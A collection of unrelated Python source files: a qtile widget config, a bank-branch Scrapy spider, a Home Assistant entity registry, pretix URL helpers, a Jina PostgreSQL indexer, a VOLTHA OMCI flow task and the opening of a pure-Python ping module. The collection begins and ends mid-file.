    return rev


class TestSolution(unittest.TestCase):
    def test_example(self):
        x = 123
        ans = reverse(x)
        self.assertEqual(ans, 321)

    def test_neg(self):
        x = -123
        ans = reverse(x)
        self.assertEqual(ans, -321)

    def test_zero(self):
        x = 120
        ans = reverse(x)
        self.assertEqual(ans, 21)

    def test_many_zeros(self):
        x = 100000
        ans = reverse(x)
        self.assertEqual(ans, 1)

    def test_overflow(self):
        x = 4294967294
        ans = reverse(x)
        self.assertEqual(ans, 0)

    def test_neg_overflow(self):
        x = -4294967294
        ans = reverse(x)
        self.assertEqual(ans, 0)


if __name__ == "__main__":
    unittest.main()
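

# Companion sketch: the same reversal done digit-by-digit, avoiding the string
# round trip while keeping the identical 32-bit overflow check.
def reverse_arithmetic(x: int) -> int:
    sign = -1 if x < 0 else 1
    x = abs(x)
    rev = 0
    while x:
        rev = rev * 10 + x % 10  # pop the last digit of x, push it onto rev
        x //= 10
    rev *= sign
    if rev < -(2 ** 31) or rev > (2 ** 31 - 1):
        return 0
    return rev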
the-stack_106_24356
import os import socket from libqtile import qtile, widget from settings.shortcut import terminal, font from settings.themes import colors from settings.widgets_mod import * # PRYMARY WIDGETS LIST def init_widgets_list(): widgets_list = [ group_box(colors["color2"], colors["color3"]), current_layout(), window_name(), widget.CapsNumLockIndicator( font=f"{font} Bold", fontsize=12, fmt="{}", foreground=colors["color4"], ), widget.Volume( font=f"{font}", fmt="\uf026 {}", foreground=colors["color3"], mouse_callbacks={ "Button3": lambda: qtile.cmd_spawn("pavucontrol"), }, ), widget.Battery( font=f"{font} Bold", format=" {percent:2.0%} \ufbd3", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn("xfce4-power-manager-settings"), "Button2": lambda: qtile.cmd_spawn(terminal + " -e htop"), "Button3": lambda: qtile.cmd_spawn("xfce4-taskmanager"), }, update_interval=10, foreground=colors["color2"], ), widget.CheckUpdates( font=f"{font} Bold", distro="Arch_checkupdates", execute=f"{terminal} -e sudo pacman -Syu", update_interval=1800, display_format='\uf547 {updates} Updates', colour_have_updates=colors["color1"], ), widget.Clock( font=f"{font} Bold", format="\uf5ec %c", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn(terminal + " -e calcurse"), "Button3": lambda: qtile.cmd_spawn("gnome-calendar") }, foreground=colors["color1"], ), systray(size=22), ] return widgets_list # SECONDARY WINDEWTS LIST def init_widgets_list01(): widgets_list = [ current_layout(), window_name(), group_box(colors["color3"], colors["color2"]), ] return widgets_list
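

# Usage sketch: how these lists are typically attached to screens in config.py.
# The bar size and the two-screen layout are assumptions about the surrounding
# qtile configuration, not values taken from this file.
def init_screens():
    from libqtile import bar
    from libqtile.config import Screen

    return [
        Screen(top=bar.Bar(widgets=init_widgets_list(), size=26)),
        Screen(top=bar.Bar(widgets=init_widgets_list01(), size=26)),
    ]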
the-stack_106_24357
# -*- coding: utf-8 -*- import json import re import scrapy from locations.hours import OpeningHours from locations.items import GeojsonPointItem class FnbUSSpider(scrapy.Spider): name = "fnb_us" item_attributes = {"brand": "First National Bank", "brand_wikidata": "Q5426765"} allowed_domains = ["fnb-online.com"] start_urls = ("https://locations.fnb-online.com/sitemap.xml",) def parse(self, response): response.selector.remove_namespaces() for url in response.xpath("//loc/text()").extract(): if url.count("/") == 4: # These are dead links meta = {"dont_redirect": True} yield scrapy.Request(url, callback=self.parse_store, meta=meta) def parse_store(self, response): script = response.xpath( '//script/text()[contains(.,"var location_data")]' ).get() start = script.index("var location_data =") + len("var location_data =") data = json.decoder.JSONDecoder().raw_decode(script, start)[0][0] properties = { "ref": data["id"], "lat": data["lat"], "lon": data["lng"], "name": data["name"], "addr_full": data["address"], "city": data["city"], "state": data["state"], "postcode": data["postalcode"], "country": data["country"], "phone": "phone", "website": response.url, "opening_hours": data["branchhours"], } yield GeojsonPointItem(**properties)
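

# Usage sketch: running the spider outside the usual `scrapy crawl fnb_us`.
# The feed path and format below are placeholders, not project settings.
if __name__ == "__main__":
    from scrapy.crawler import CrawlerProcess

    process = CrawlerProcess(settings={
        "FEEDS": {"fnb_us.jsonl": {"format": "jsonlines"}},
    })
    process.crawl(FnbUSSpider)
    process.start()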
the-stack_106_24360
"""Provide a registry to track entity IDs. The Entity Registry keeps a registry of entities. Entities are uniquely identified by their domain, platform and a unique id provided by that platform. The Entity Registry will persist itself 10 seconds after a new entity is registered. Registering a new entity while a timer is in progress resets the timer. After initializing, call EntityRegistry.async_ensure_loaded to load the data from disk. """ from collections import OrderedDict from itertools import chain import logging import os import weakref import attr from ..core import callback, split_entity_id from ..loader import bind_hass from ..util import ensure_unique_string, slugify from ..util.yaml import load_yaml, save_yaml PATH_REGISTRY = 'entity_registry.yaml' DATA_REGISTRY = 'entity_registry' SAVE_DELAY = 10 _LOGGER = logging.getLogger(__name__) _UNDEF = object() DISABLED_HASS = 'hass' DISABLED_USER = 'user' @attr.s(slots=True, frozen=True) class RegistryEntry: """Entity Registry Entry.""" entity_id = attr.ib(type=str) unique_id = attr.ib(type=str) platform = attr.ib(type=str) name = attr.ib(type=str, default=None) config_entry_id = attr.ib(type=str, default=None) disabled_by = attr.ib( type=str, default=None, validator=attr.validators.in_((DISABLED_HASS, DISABLED_USER, None))) update_listeners = attr.ib(type=list, default=attr.Factory(list), repr=False) domain = attr.ib(type=str, init=False, repr=False) @domain.default def _domain_default(self): """Compute domain value.""" return split_entity_id(self.entity_id)[0] @property def disabled(self): """Return if entry is disabled.""" return self.disabled_by is not None def add_update_listener(self, listener): """Listen for when entry is updated. Listener: Callback function(old_entry, new_entry) """ self.update_listeners.append(weakref.ref(listener)) class EntityRegistry: """Class to hold a registry of entities.""" def __init__(self, hass): """Initialize the registry.""" self.hass = hass self.entities = None self._load_task = None self._sched_save = None @callback def async_is_registered(self, entity_id): """Check if an entity_id is currently registered.""" return entity_id in self.entities @callback def async_get_entity_id(self, domain: str, platform: str, unique_id: str): """Check if an entity_id is currently registered.""" for entity in self.entities.values(): if entity.domain == domain and entity.platform == platform and \ entity.unique_id == unique_id: return entity.entity_id return None @callback def async_generate_entity_id(self, domain, suggested_object_id): """Generate an entity ID that does not conflict. Conflicts checked against registered and currently existing entities. """ return ensure_unique_string( '{}.{}'.format(domain, slugify(suggested_object_id)), chain(self.entities.keys(), self.hass.states.async_entity_ids(domain)) ) @callback def async_get_or_create(self, domain, platform, unique_id, *, suggested_object_id=None, config_entry_id=None): """Get entity. 
Create if it doesn't exist.""" entity_id = self.async_get_entity_id(domain, platform, unique_id) if entity_id: return self.entities[entity_id] entity_id = self.async_generate_entity_id( domain, suggested_object_id or '{}_{}'.format(platform, unique_id)) entity = RegistryEntry( entity_id=entity_id, config_entry_id=config_entry_id, unique_id=unique_id, platform=platform, ) self.entities[entity_id] = entity _LOGGER.info('Registered new %s.%s entity: %s', domain, platform, entity_id) self.async_schedule_save() return entity @callback def async_update_entity(self, entity_id, *, name=_UNDEF): """Update properties of an entity.""" old = self.entities[entity_id] changes = {} if name is not _UNDEF and name != old.name: changes['name'] = name if not changes: return old new = self.entities[entity_id] = attr.evolve(old, **changes) to_remove = [] for listener_ref in new.update_listeners: listener = listener_ref() if listener is None: to_remove.append(listener) else: try: listener.async_registry_updated(old, new) except Exception: # pylint: disable=broad-except _LOGGER.exception('Error calling update listener') for ref in to_remove: new.update_listeners.remove(ref) self.async_schedule_save() return new async def async_ensure_loaded(self): """Load the registry from disk.""" if self.entities is not None: return if self._load_task is None: self._load_task = self.hass.async_add_job(self._async_load) await self._load_task async def _async_load(self): """Load the entity registry.""" path = self.hass.config.path(PATH_REGISTRY) entities = OrderedDict() if os.path.isfile(path): data = await self.hass.async_add_job(load_yaml, path) for entity_id, info in data.items(): entities[entity_id] = RegistryEntry( entity_id=entity_id, config_entry_id=info.get('config_entry_id'), unique_id=info['unique_id'], platform=info['platform'], name=info.get('name'), disabled_by=info.get('disabled_by') ) self.entities = entities self._load_task = None @callback def async_schedule_save(self): """Schedule saving the entity registry.""" if self._sched_save is not None: self._sched_save.cancel() self._sched_save = self.hass.loop.call_later( SAVE_DELAY, self.hass.async_add_job, self._async_save ) async def _async_save(self): """Save the entity registry to a file.""" self._sched_save = None data = OrderedDict() for entry in self.entities.values(): data[entry.entity_id] = { 'config_entry_id': entry.config_entry_id, 'unique_id': entry.unique_id, 'platform': entry.platform, 'name': entry.name, } await self.hass.async_add_job( save_yaml, self.hass.config.path(PATH_REGISTRY), data) @bind_hass async def async_get_registry(hass) -> EntityRegistry: """Return entity registry instance.""" registry = hass.data.get(DATA_REGISTRY) if registry is None: registry = hass.data[DATA_REGISTRY] = EntityRegistry(hass) await registry.async_ensure_loaded() return registry
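

# Usage sketch: how an integration claims a stable entity ID from the registry.
# The platform and unique_id values are placeholders; `hass` is assumed to be
# a running Home Assistant instance.
async def claim_entity_id(hass):
    registry = await async_get_registry(hass)
    entry = registry.async_get_or_create(
        'sensor', 'example_platform', 'serial-1234',
        suggested_object_id='living_room_temperature',
    )
    # the same unique_id always maps back to the same entity_id on restart
    return entry.entity_id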
the-stack_106_24361
import numpy as np import openml import pandas as pd import scipy.sparse as sp __all__ = ['query_regression_tasks', 'load_openml'] def query_regression_tasks(n_samples_min=100, n_samples_max=5000, n_features_max=None): task_list = openml.tasks.list_tasks(task_type_id=2) tasks = pd.DataFrame.from_dict(task_list, orient='index') # filter tasks with all numeric features tasks = (tasks.query('NumberOfInstances <= {}'.format(n_samples_max)) .query('NumberOfInstances >= {}'.format(n_samples_min)) #.query('NumberOfNumericFeatures == NumberOfFeatures') .query('NumberOfInstancesWithMissingValues == 0.0')) if n_features_max: tasks = tasks.query('NumberOfFeatures <= {}'.format(n_features_max)) return tasks[['did', 'name', 'NumberOfInstances', 'NumberOfFeatures']] def load_openml(name, n_samples_min=100, n_samples_max=50000): tasks = query_regression_tasks(n_samples_min=n_samples_min, n_samples_max=n_samples_max) dataset_id = int(tasks.query('name == "{0}"'.format(name))['did'].values[0]) dataset = openml.datasets.get_dataset(dataset_id) X, y, categorical_indicator, attribute_names = dataset.get_data( dataset_format='array', target=dataset.default_target_attribute ) if sp.issparse(X): X = X.toarray() return X.astype(np.float64), y.astype(np.float64)
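

# Usage sketch: browse the filtered regression tasks, then load one by name.
# Requires network access to openml.org; the first task name is arbitrary.
if __name__ == "__main__":
    tasks = query_regression_tasks(n_samples_min=100, n_samples_max=5000)
    print(tasks.head())
    X, y = load_openml(tasks['name'].iloc[0])
    print(X.shape, y.shape)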
the-stack_106_24365
# # This file is part of pretix (Community Edition). # # Copyright (C) 2014-2020 Raphael Michel and contributors # Copyright (C) 2020-2021 rami.io GmbH and contributors # # This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General # Public License as published by the Free Software Foundation in version 3 of the License. # # ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are # applicable granting you additional permissions and placing additional restrictions on your usage of this software. # Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive # this file, see <https://pretix.eu/about/en/license>. # # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more # details. # # You should have received a copy of the GNU Affero General Public License along with this program. If not, see # <https://www.gnu.org/licenses/>. # # This file is based on an earlier version of pretix which was released under the Apache License 2.0. The full text of # the Apache License 2.0 can be obtained at <http://www.apache.org/licenses/LICENSE-2.0>. # # This file may have since been changed and any changes are released under the terms of AGPLv3 as described above. A # full history of changes and contributors is available at <https://github.com/pretix/pretix>. # # This file contains Apache-licensed contributions copyrighted by: Tobias Kunze # # Unless required by applicable law or agreed to in writing, software distributed under the Apache License 2.0 is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under the License. 
from urllib.parse import urljoin, urlsplit from django.conf import settings from django.db.models import Q from django.urls import reverse from pretix.base.models import Event, Organizer from .models import KnownDomain def get_event_domain(event, fallback=False, return_info=False): assert isinstance(event, Event) suffix = ('_fallback' if fallback else '') + ('_info' if return_info else '') domain = getattr(event, '_cached_domain' + suffix, None) or event.cache.get('domain' + suffix) if domain is None: domain = None, None if fallback: domains = KnownDomain.objects.filter( Q(event=event) | Q(organizer_id=event.organizer_id, event__isnull=True) ) domains_event = [d for d in domains if d.event_id == event.pk] domains_org = [d for d in domains if not d.event_id] if domains_event: domain = domains_event[0].domainname, "event" elif domains_org: domain = domains_org[0].domainname, "organizer" else: domains = event.domains.all() domain = domains[0].domainname if domains else None, "event" event.cache.set('domain' + suffix, domain or 'none') setattr(event, '_cached_domain' + suffix, domain or 'none') elif domain == 'none': setattr(event, '_cached_domain' + suffix, 'none') domain = None, None else: setattr(event, '_cached_domain' + suffix, domain) return domain if return_info or not isinstance(domain, tuple) else domain[0] def get_organizer_domain(organizer): assert isinstance(organizer, Organizer) domain = getattr(organizer, '_cached_domain', None) or organizer.cache.get('domain') if domain is None: domains = organizer.domains.filter(event__isnull=True) domain = domains[0].domainname if domains else None organizer.cache.set('domain', domain or 'none') organizer._cached_domain = domain or 'none' elif domain == 'none': organizer._cached_domain = 'none' return None else: organizer._cached_domain = domain return domain def mainreverse(name, kwargs=None): """ Works similar to ``django.core.urlresolvers.reverse`` but uses the maindomain URLconf even if on a subpath. Non-keyword arguments are not supported as we want do discourage using them for better readability. :param name: The name of the URL route :type name: str :param kwargs: A dictionary of additional keyword arguments that should be used. You do not need to provide the organizer or event slug here, it will be added automatically as needed. :returns: An absolute URL (including scheme and host) as a string """ from pretix.multidomain import maindomain_urlconf kwargs = kwargs or {} return reverse(name, kwargs=kwargs, urlconf=maindomain_urlconf) def eventreverse(obj, name, kwargs=None): """ Works similar to ``django.core.urlresolvers.reverse`` but takes into account that some organizers or events might have their own (sub)domain instead of a subpath. Non-keyword arguments are not supported as we want do discourage using them for better readability. :param obj: An ``Event`` or ``Organizer`` object :param name: The name of the URL route :type name: str :param kwargs: A dictionary of additional keyword arguments that should be used. You do not need to provide the organizer or event slug here, it will be added automatically as needed. 
:returns: An absolute URL (including scheme and host) as a string """ from pretix.multidomain import ( event_domain_urlconf, maindomain_urlconf, organizer_domain_urlconf, ) c = None if not kwargs: c = obj.cache url = c.get('urlrev_{}'.format(name)) if url: return url kwargs = kwargs or {} if isinstance(obj, Event): organizer = obj.organizer event = obj kwargs['event'] = obj.slug elif isinstance(obj, Organizer): organizer = obj event = None else: raise TypeError('obj should be Event or Organizer') if event: domain, domaintype = get_event_domain(obj, fallback=True, return_info=True) else: domain, domaintype = get_organizer_domain(organizer), "organizer" if domain: if domaintype == "event" and 'event' in kwargs: del kwargs['event'] if 'organizer' in kwargs: del kwargs['organizer'] path = reverse(name, kwargs=kwargs, urlconf=event_domain_urlconf if domaintype == "event" else organizer_domain_urlconf) siteurlsplit = urlsplit(settings.SITE_URL) if siteurlsplit.port and siteurlsplit.port not in (80, 443): domain = '%s:%d' % (domain, siteurlsplit.port) return urljoin('%s://%s' % (siteurlsplit.scheme, domain), path) kwargs['organizer'] = organizer.slug url = reverse(name, kwargs=kwargs, urlconf=maindomain_urlconf) if not kwargs and c: c.set('urlrev_{}'.format(url), url) return url def build_absolute_uri(obj, urlname, kwargs=None): reversedurl = eventreverse(obj, urlname, kwargs) if '://' in reversedurl: return reversedurl return urljoin(settings.SITE_URL, reversedurl)
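

# Usage sketch: typical call sites for the helpers above. Treat the route
# names and kwargs as illustrative; the real names live in pretix's URLconfs.
def example_links(event, order_code, secret):
    index_url = eventreverse(event, 'presale:event.index')
    order_url = build_absolute_uri(
        event, 'presale:event.order',
        kwargs={'order': order_code, 'secret': secret},
    )
    return index_url, order_url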
the-stack_106_24368
__copyright__ = "Copyright (c) 2021 Jina AI Limited. All rights reserved." __license__ = "Apache-2.0" from typing import Tuple, Generator import numpy as np from jina.executors.indexers.dbms import BaseDBMSIndexer from jina.executors.indexers.dump import export_dump_streaming from .postgreshandler import PostgreSQLDBMSHandler class PostgreSQLDBMSIndexer(BaseDBMSIndexer): """:class:`PostgreSQLDBMSIndexer` PostgreSQL based BDMS Indexer. Initialize the PostgreSQLDBIndexer. :param hostname: hostname of the machine :param port: the port :param username: the username to authenticate :param password: the password to authenticate :param database: the database name :param table: the table name to use :param args: other arguments :param kwargs: other keyword arguments """ def __init__( self, hostname: str = '127.0.0.1', port: int = 5432, username: str = 'postgres', password: str = '123456', database: str = 'postgres', table: str = 'default_table', *args, **kwargs ): super().__init__(*args, **kwargs) self.hostname = hostname self.port = port self.username = username self.password = password self.database = database self.table = table def _get_generator(self) -> Generator[Tuple[str, np.array, bytes], None, None]: with self.handler as handler: # always order the dump by id as integer handler.cursor.execute(f"SELECT * from {handler.table} ORDER BY ID::int") records = handler.cursor.fetchall() for rec in records: yield rec[0], rec[1], rec[2] @property def size(self): """Obtain the size of the table .. # noqa: DAR201 """ with self.handler as postgres_handler: postgres_handler.cursor.execute(f"SELECT COUNT(*) from {self.handler.table}") records = postgres_handler.cursor.fetchall() return records[0][0] def post_init(self): """Initialize the PostgresHandler inside the Indexer.""" from .postgreshandler import PostgreSQLDBMSHandler super().post_init() self.handler = PostgreSQLDBMSHandler( hostname=self.hostname, port=self.port, username=self.username, password=self.password, database=self.database, table=self.table) def get_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgreSQLDBMS.""" return self.handler def get_add_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgresSQLDBMS.""" return self.handler def get_create_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgresSQLDBMS.""" return self.handler def get_query_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgresSQLDBMS.""" return self.handler def add(self, ids, vecs, metas, *args, **kwargs): """Add a Document to PostgreSQLDBMS. :param ids: List of doc ids to be added :param vecs: List of vecs to be added :param metas: List of metas of docs to be added """ with self.handler as postgres_handler: postgres_handler.add(ids=ids, vecs=vecs, metas=metas) def update(self, ids, vecs, metas, *args, **kwargs): """Updated document from the database. :param ids: Ids of Docs to be updated :param vecs: List of vecs to be updated :param metas: List of metas of docs to be updated """ with self.handler as postgres_handler: postgres_handler.update(ids=ids, vecs=vecs, metas=metas) def delete(self, ids, *args, **kwargs): """Delete document from the database. :param ids: Ids of Document to be removed """ with self.handler as postgres_handler: postgres_handler.delete(ids=ids) def dump(self, path, shards): """Dump the index :param path: the path to which to dump :param shards: the nr of shards to which to dump """ export_dump_streaming( path, shards=shards, size=self.size, data=self._get_generator() )
the-stack_106_24370
# # Copyright 2018 the original author or authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from twisted.internet import reactor from twisted.internet.defer import inlineCallbacks, failure, returnValue from voltha.extensions.omci.omci_me import * from voltha.extensions.omci.tasks.task import Task from voltha.extensions.omci.omci_defs import * from voltha.adapters.adtran_onu.flow.flow_entry import FlowEntry OP = EntityOperations RC = ReasonCodes class ServiceInstallFailure(Exception): """ This error is raised by default when the flow-install fails """ class AdtnInstallFlowTask(Task): """ OpenOMCI MIB Flow Install Task Currently, the only service tech profiles expected by v2.0 will be for AT&T residential data service and DT residential data service. """ task_priority = Task.DEFAULT_PRIORITY + 10 name = "ADTRAN MIB Install Flow Task" def __init__(self, omci_agent, handler, flow_entry): """ Class initialization :param omci_agent: (OpenOMCIAgent) OMCI Adapter agent :param handler: (AdtranOnuHandler) ONU Handler :param flow_entry: (FlowEntry) Flow to install """ super(AdtnInstallFlowTask, self).__init__(AdtnInstallFlowTask.name, omci_agent, handler.device_id, priority=AdtnInstallFlowTask.task_priority, exclusive=False) self._handler = handler self._onu_device = omci_agent.get_device(handler.device_id) self._local_deferred = None self._flow_entry = flow_entry self._install_by_delete = True # TODO: Cleanup below that is not needed is_upstream = flow_entry.flow_direction in FlowEntry.upstream_flow_types uni_port = flow_entry.in_port if is_upstream else flow_entry.out_port pon_port = flow_entry.out_port if is_upstream else flow_entry.in_port self._uni = handler.uni_port(uni_port) self._pon = handler.pon_port(pon_port) # Entity IDs. IDs with values can probably be most anything for most ONUs, # IDs set to None are discovered/set # # TODO: Probably need to store many of these in the appropriate object (UNI, PON,...) # self._ethernet_uni_entity_id = self._handler.uni_ports[0].entity_id self._ieee_mapper_service_profile_entity_id = self._pon.hsi_8021p_mapper_entity_id # self._hsi_mac_bridge_port_ani_entity_id = self._pon.hsi_mac_bridge_port_ani_entity_id # Next to are specific self._mac_bridge_service_profile_entity_id = handler.mac_bridge_service_profile_entity_id def cancel_deferred(self): super(AdtnInstallFlowTask, self).cancel_deferred() d, self._local_deferred = self._local_deferred, None try: if d is not None and not d.called: d.cancel() except: pass def start(self): """ Start the flow installation """ super(AdtnInstallFlowTask, self).start() self._local_deferred = reactor.callLater(0, self.perform_flow_install) def stop(self): """ Shutdown flow install task """ self.log.debug('stopping') self.cancel_deferred() super(AdtnInstallFlowTask, self).stop() def check_status_and_state(self, results, operation=''): """ Check the results of an OMCI response. An exception is thrown if the task was cancelled or an error was detected. 
:param results: (OmciFrame) OMCI Response frame :param operation: (str) what operation was being performed :return: True if successful, False if the entity existed (already created) """ omci_msg = results.fields['omci_message'].fields status = omci_msg['success_code'] error_mask = omci_msg.get('parameter_error_attributes_mask', 'n/a') failed_mask = omci_msg.get('failed_attributes_mask', 'n/a') unsupported_mask = omci_msg.get('unsupported_attributes_mask', 'n/a') self.log.debug(operation, status=status, error_mask=error_mask, failed_mask=failed_mask, unsupported_mask=unsupported_mask) if status == RC.Success: self.strobe_watchdog() return True elif status == RC.InstanceExists: return False elif status == RC.UnknownInstance and operation == 'delete': return True raise ServiceInstallFailure('{} failed with a status of {}, error_mask: {}, failed_mask: {}, unsupported_mask: {}' .format(operation, status, error_mask, failed_mask, unsupported_mask)) @inlineCallbacks def perform_flow_install(self): """ Send the commands to configure the flow. Currently this task uses the pre-installed default TCONT and GEM Port. This will change when Technology Profiles are supported. """ self.log.info('perform-flow-install', vlan_vid=self._flow_entry.vlan_vid) if self._flow_entry.vlan_vid == 0: return def resources_available(): # TODO: Rework for non-xpon mode return (len(self._handler.uni_ports) > 0 and len(self._pon.tconts) and len(self._pon.gem_ports)) if self._handler.enabled and resources_available(): omci = self._onu_device.omci_cc brg_id = self._mac_bridge_service_profile_entity_id vlan_vid = self._flow_entry.vlan_vid if self._install_by_delete: # Delete any existing flow before adding this new one msg = ExtendedVlanTaggingOperationConfigurationDataFrame(brg_id, attributes=None) frame = msg.delete() try: results = yield omci.send(frame) self.check_status_and_state(results, operation='delete') attributes = dict( association_type=2, # Assoc Type, PPTP Ethernet UNI associated_me_pointer=self._ethernet_uni_entity_id # Assoc ME, PPTP Entity Id ) frame = ExtendedVlanTaggingOperationConfigurationDataFrame( self._mac_bridge_service_profile_entity_id, attributes=attributes ).create() results = yield omci.send(frame) self.check_status_and_state(results, 'flow-recreate-before-set') # TODO: Any of the following needed as well # # Delete bridge ani side vlan filter # msg = VlanTaggingFilterDataFrame(self._hsi_mac_bridge_port_ani_entity_id) # frame = msg.delete() # # results = yield omci.send(frame) # self.check_status_and_state(results, 'flow-delete-vlan-tagging-filter-data') # # # Re-Create bridge ani side vlan filter # msg = VlanTaggingFilterDataFrame( # self._hsi_mac_bridge_port_ani_entity_id, # Entity ID # vlan_tcis=[vlan_vid], # VLAN IDs # forward_operation=0x10 # ) # frame = msg.create() # # results = yield omci.send(frame) # self.check_status_and_state(results, 'flow-create-vlan-tagging-filter-data') except Exception as e: self.log.exception('flow-delete-before-install-failure', e=e) self.deferred.errback(failure.Failure(e)) returnValue(None) try: # Now set the VLAN Tagging Operation up as we want it # Update uni side extended vlan filter # filter for untagged # probably for eapol # TODO: lots of magic # attributes = dict( # # This table filters and tags upstream frames # received_frame_vlan_tagging_operation_table= # VlanTaggingOperation( # filter_outer_priority=15, # This entry is not a double-tag rule (ignore out tag rules) # filter_outer_vid=4096, # Do not filter on the outer VID value # 
filter_outer_tpid_de=0, # Do not filter on the outer TPID field # # filter_inner_priority=15, # This is a no-tag rule, ignore all other VLAN tag filter fields # filter_inner_vid=4096, # Do not filter on the inner VID # filter_inner_tpid_de=0, # Do not filter on inner TPID field # filter_ether_type=0, # Do not filter on EtherType # # treatment_tags_to_remove=0, # Remove 0 tags # # treatment_outer_priority=15, # Do not add an outer tag # treatment_outer_vid=0, # n/a # treatment_outer_tpid_de=0, # n/a # # treatment_inner_priority=0, # Add an inner tag and insert this value as the priority # treatment_inner_vid=vlan_vid, # Push this tag onto the frame # treatment_inner_tpid_de=4 # set TPID # ) # ) # msg = ExtendedVlanTaggingOperationConfigurationDataFrame( # self._mac_bridge_service_profile_entity_id, # Bridge Entity ID # attributes=attributes # See above # ) # frame = msg.set() # # results = yield omci.send(frame) # self.check_status_and_state(results, # 'flow-set-ext-vlan-tagging-op-config-data-untagged') # Update uni side extended vlan filter # filter for vlan 0 # TODO: lots of magic ################################################################################ # Update Extended VLAN Tagging Operation Config Data # # Specifies the TPIDs in use and that operations in the downstream direction are # inverse to the operations in the upstream direction # TODO: Downstream mode may need to be modified once we work more on the flow rules attributes = dict( input_tpid=0x8100, # input TPID output_tpid=0x8100, # output TPID downstream_mode=0, # inverse of upstream ) msg = ExtendedVlanTaggingOperationConfigurationDataFrame( self._mac_bridge_service_profile_entity_id, # Bridge Entity ID attributes=attributes # See above ) frame = msg.set() results = yield omci.send(frame) self.check_status_and_state(results, 'set-extended-vlan-tagging-operation-configuration-data') attributes = dict( received_frame_vlan_tagging_operation_table= VlanTaggingOperation( filter_outer_priority=15, # This entry is not a double-tag rule filter_outer_vid=4096, # Do not filter on the outer VID value filter_outer_tpid_de=0, # Do not filter on the outer TPID field filter_inner_priority=15, # This is a no-tag rule, ignore all other VLAN tag filter fields filter_inner_vid=0x1000, # Do not filter on the inner VID filter_inner_tpid_de=0, # Do not filter on inner TPID field filter_ether_type=0, # Do not filter on EtherType treatment_tags_to_remove=0, # Remove 0 tags treatment_outer_priority=15, # Do not add an outer tag treatment_outer_vid=0, # n/a treatment_outer_tpid_de=0, # n/a treatment_inner_priority=0, # Add an inner tag and insert this value as the priority treatment_inner_vid=vlan_vid, # use this value as the VID in the inner VLAN tag treatment_inner_tpid_de=4, # set TPID ) ) msg = ExtendedVlanTaggingOperationConfigurationDataFrame( self._mac_bridge_service_profile_entity_id, # Bridge Entity ID attributes=attributes # See above ) frame = msg.set() results = yield omci.send(frame) self.check_status_and_state(results, 'flow-set-ext-vlan-tagging-op-config-data-untagged') self.deferred.callback('flow-install-success') except Exception as e: # TODO: Better context info for this exception output... self.log.exception('failed-to-install-flow', e=e) self.deferred.errback(failure.Failure(e)) else: # TODO: Provide better error reason, what was missing... e = ServiceInstallFailure('Required resources are not available') self.deferred.errback(failure.Failure(e))
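

# Usage sketch built only from the surface visible in this file (start(),
# stop(), and the task's `deferred`); real adapters normally queue the task
# through an OpenOMCI task runner instead of starting it directly.
def run_install(omci_agent, handler, flow_entry):
    task = AdtnInstallFlowTask(omci_agent, handler, flow_entry)
    task.start()
    task.deferred.addCallbacks(
        lambda result: task.log.info('flow-install-success', result=result),
        lambda reason: task.log.error('flow-install-failure', reason=reason),
    )
    return task.deferred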
the-stack_106_24371
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import division, print_function """ A pure python ping implementation using raw sockets. Compatibility: OS: Linux, Windows, MacOSX Python: 2.6 - 3.5 Note that due to the usage of RAW sockets root/Administrator privileges are requied. Derived from ping.c distributed in Linux's netkit. That code is copyright (c) 1989 by The Regents of the University of California. That code is in turn derived from code written by Mike Muuss of the US Army Ballistic Research Laboratory in December, 1983 and placed in the public domain. They have my thanks. Copyright (c) Matthew Dixon Cowles, <http://www.visi.com/~mdc/>. Distributable under the terms of the GNU General Public License version 2. Provided with no warranties of any sort. website: https://github.com/l4m3rx/python-ping """ # TODO Remove any calls to time.sleep # This would enable extension into larger framework that aren't multi threaded. import os import sys import time import array import socket import struct import select import signal if __name__ == '__main__': import argparse try: from _thread import get_ident except ImportError: def get_ident(): return 0 if sys.platform == "win32": # On Windows, the best timer is time.clock() default_timer = time.clock else: # On most other platforms the best timer is time.time() default_timer = time.time # ICMP parameters ICMP_ECHOREPLY = 0 # Echo reply (per RFC792) ICMP_ECHO = 8 # Echo request (per RFC792) ICMP_ECHO_IPV6 = 128 # Echo request (per RFC4443) ICMP_ECHO_IPV6_REPLY = 129 # Echo request (per RFC4443) ICMP_MAX_RECV = 2048 # Max size of incoming buffer MAX_SLEEP = 1000 class MStats2(object): def __init__(self): self._this_ip = '0.0.0.0' self.reset() def reset(self): self._timing_list = [] self._packets_sent = 0 self._packets_rcvd = 0 self._reset_statistics() @property def thisIP(self): return self._this_ip @thisIP.setter def thisIP(self, value): self._this_ip = value @property def pktsSent(self): return self._packets_sent @property def pktsRcvd(self): return self._packets_rcvd @property def pktsLost(self): return self._packets_sent - self._packets_rcvd @property def minTime(self): return min(self._timing_list) if self._timing_list else None @property def maxTime(self): return max(self._timing_list) if self._timing_list else None @property def totTime(self): if self._total_time is None: self._total_time = sum(self._timing_list) return self._total_time def _get_mean_time(self): if self._mean_time is None: if len(self._timing_list) > 0: self._mean_time = self.totTime / len(self._timing_list) return self._mean_time mean_time = property(_get_mean_time) avrgTime = property(_get_mean_time) @property def median_time(self): if self._median_time is None: self._median_time = self._calc_median_time() return self._median_time @property def pstdev_time(self): """Returns the 'Population Standard Deviation' of the set.""" if self._pstdev_time is None: self._pstdev_time = self._calc_pstdev_time() return self._pstdev_time @property def fracLoss(self): if self._frac_loss is None: 